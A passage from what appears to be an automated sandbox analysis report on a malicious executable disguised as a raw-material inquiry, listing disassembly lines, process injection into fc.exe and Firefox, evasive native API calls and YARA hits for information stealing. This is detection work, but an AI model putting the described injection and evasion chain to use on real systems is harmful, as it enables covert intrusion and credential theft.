              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A0 mov eax, dword ptr fs:[00000030h]0_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E0096E mov eax, dword ptr fs:[00000030h]0_2_00E0096E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E0096E mov edx, dword ptr fs:[00000030h]0_2_00E0096E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E0096E mov eax, dword ptr fs:[00000030h]0_2_00E0096E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4C97C mov eax, dword ptr fs:[00000030h]0_2_00E4C97C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E64978 mov eax, dword ptr fs:[00000030h]0_2_00E64978
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E64978 mov eax, dword ptr fs:[00000030h]0_2_00E64978
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E40946 mov eax, dword ptr fs:[00000030h]0_2_00E40946
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94940 mov eax, dword ptr fs:[00000030h]0_2_00E94940
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE6962 mov eax, dword ptr fs:[00000030h]0_2_00DE6962
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE6962 mov eax, dword ptr fs:[00000030h]0_2_00DE6962
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE6962 mov eax, dword ptr fs:[00000030h]0_2_00DE6962
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB8918 mov eax, dword ptr fs:[00000030h]0_2_00DB8918
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB8918 mov eax, dword ptr fs:[00000030h]0_2_00DB8918
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4892A mov eax, dword ptr fs:[00000030h]0_2_00E4892A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E5892B mov eax, dword ptr fs:[00000030h]0_2_00E5892B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E908 mov eax, dword ptr fs:[00000030h]0_2_00E3E908
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E908 mov eax, dword ptr fs:[00000030h]0_2_00E3E908
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4C912 mov eax, dword ptr fs:[00000030h]0_2_00E4C912
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC0AD0 mov eax, dword ptr fs:[00000030h]0_2_00DC0AD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF4AD0 mov eax, dword ptr fs:[00000030h]0_2_00DF4AD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF4AD0 mov eax, dword ptr fs:[00000030h]0_2_00DF4AD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E16ACC mov eax, dword ptr fs:[00000030h]0_2_00E16ACC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E16ACC mov eax, dword ptr fs:[00000030h]0_2_00E16ACC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E16ACC mov eax, dword ptr fs:[00000030h]0_2_00E16ACC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFAAEE mov eax, dword ptr fs:[00000030h]0_2_00DFAAEE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFAAEE mov eax, dword ptr fs:[00000030h]0_2_00DFAAEE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E16AA4 mov eax, dword ptr fs:[00000030h]0_2_00E16AA4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF8A90 mov edx, dword ptr fs:[00000030h]0_2_00DF8A90
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA80 mov eax, dword ptr fs:[00000030h]0_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA80 mov eax, dword ptr fs:[00000030h]0_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA80 mov eax, dword ptr fs:[00000030h]0_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA80 mov eax, dword ptr fs:[00000030h]0_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA80 mov eax, dword ptr fs:[00000030h]0_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA80 mov eax, dword ptr fs:[00000030h]0_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA80 mov eax, dword ptr fs:[00000030h]0_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA80 mov eax, dword ptr fs:[00000030h]0_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA80 mov eax, dword ptr fs:[00000030h]0_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94A80 mov eax, dword ptr fs:[00000030h]0_2_00E94A80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC8AA0 mov eax, dword ptr fs:[00000030h]0_2_00DC8AA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC8AA0 mov eax, dword ptr fs:[00000030h]0_2_00DC8AA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0A5B mov eax, dword ptr fs:[00000030h]0_2_00DD0A5B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0A5B mov eax, dword ptr fs:[00000030h]0_2_00DD0A5B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6EA60 mov eax, dword ptr fs:[00000030h]0_2_00E6EA60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6A50 mov eax, dword ptr fs:[00000030h]0_2_00DC6A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6A50 mov eax, dword ptr fs:[00000030h]0_2_00DC6A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6A50 mov eax, dword ptr fs:[00000030h]0_2_00DC6A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6A50 mov eax, dword ptr fs:[00000030h]0_2_00DC6A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6A50 mov eax, dword ptr fs:[00000030h]0_2_00DC6A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6A50 mov eax, dword ptr fs:[00000030h]0_2_00DC6A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6A50 mov eax, dword ptr fs:[00000030h]0_2_00DC6A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3CA72 mov eax, dword ptr fs:[00000030h]0_2_00E3CA72
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3CA72 mov eax, dword ptr fs:[00000030h]0_2_00E3CA72
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFCA6F mov eax, dword ptr fs:[00000030h]0_2_00DFCA6F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFCA6F mov eax, dword ptr fs:[00000030h]0_2_00DFCA6F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFCA6F mov eax, dword ptr fs:[00000030h]0_2_00DFCA6F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE4A35 mov eax, dword ptr fs:[00000030h]0_2_00DE4A35
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE4A35 mov eax, dword ptr fs:[00000030h]0_2_00DE4A35
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEEA2E mov eax, dword ptr fs:[00000030h]0_2_00DEEA2E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4CA11 mov eax, dword ptr fs:[00000030h]0_2_00E4CA11
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFCA24 mov eax, dword ptr fs:[00000030h]0_2_00DFCA24
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC0BCD mov eax, dword ptr fs:[00000030h]0_2_00DC0BCD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC0BCD mov eax, dword ptr fs:[00000030h]0_2_00DC0BCD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC0BCD mov eax, dword ptr fs:[00000030h]0_2_00DC0BCD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4CBF0 mov eax, dword ptr fs:[00000030h]0_2_00E4CBF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE0BCB mov eax, dword ptr fs:[00000030h]0_2_00DE0BCB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE0BCB mov eax, dword ptr fs:[00000030h]0_2_00DE0BCB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE0BCB mov eax, dword ptr fs:[00000030h]0_2_00DE0BCB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEEBFC mov eax, dword ptr fs:[00000030h]0_2_00DEEBFC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC8BF0 mov eax, dword ptr fs:[00000030h]0_2_00DC8BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC8BF0 mov eax, dword ptr fs:[00000030h]0_2_00DC8BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC8BF0 mov eax, dword ptr fs:[00000030h]0_2_00DC8BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6EBD0 mov eax, dword ptr fs:[00000030h]0_2_00E6EBD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E74BB0 mov eax, dword ptr fs:[00000030h]0_2_00E74BB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E74BB0 mov eax, dword ptr fs:[00000030h]0_2_00E74BB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0BBE mov eax, dword ptr fs:[00000030h]0_2_00DD0BBE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0BBE mov eax, dword ptr fs:[00000030h]0_2_00DD0BBE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB8B50 mov eax, dword ptr fs:[00000030h]0_2_00DB8B50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E68B42 mov eax, dword ptr fs:[00000030h]0_2_00E68B42
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E56B40 mov eax, dword ptr fs:[00000030h]0_2_00E56B40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E56B40 mov eax, dword ptr fs:[00000030h]0_2_00E56B40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBCB7E mov eax, dword ptr fs:[00000030h]0_2_00DBCB7E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8AB40 mov eax, dword ptr fs:[00000030h]0_2_00E8AB40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E74B4B mov eax, dword ptr fs:[00000030h]0_2_00E74B4B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E74B4B mov eax, dword ptr fs:[00000030h]0_2_00E74B4B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6EB50 mov eax, dword ptr fs:[00000030h]0_2_00E6EB50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E92B57 mov eax, dword ptr fs:[00000030h]0_2_00E92B57
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E92B57 mov eax, dword ptr fs:[00000030h]0_2_00E92B57
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E92B57 mov eax, dword ptr fs:[00000030h]0_2_00E92B57
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E92B57 mov eax, dword ptr fs:[00000030h]0_2_00E92B57
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E88B28 mov eax, dword ptr fs:[00000030h]0_2_00E88B28
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E88B28 mov eax, dword ptr fs:[00000030h]0_2_00E88B28
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94B00 mov eax, dword ptr fs:[00000030h]0_2_00E94B00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3EB1D mov eax, dword ptr fs:[00000030h]0_2_00E3EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3EB1D mov eax, dword ptr fs:[00000030h]0_2_00E3EB1D

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeSection loaded: NULL target: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 5476Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: gGZaaTbTIZmmI.exe, 00000004.00000000.2098104901.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000004.00000002.4278216644.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278645577.0000000001170000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: gGZaaTbTIZmmI.exe, 00000004.00000000.2098104901.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000004.00000002.4278216644.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278645577.0000000001170000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: gGZaaTbTIZmmI.exe, 00000004.00000000.2098104901.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000004.00000002.4278216644.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278645577.0000000001170000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: gGZaaTbTIZmmI.exe, 00000004.00000000.2098104901.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000004.00000002.4278216644.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278645577.0000000001170000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.CSZ inquiry for MH raw material.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4277646294.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4278415007.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2174886702.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4278497197.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4278558823.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
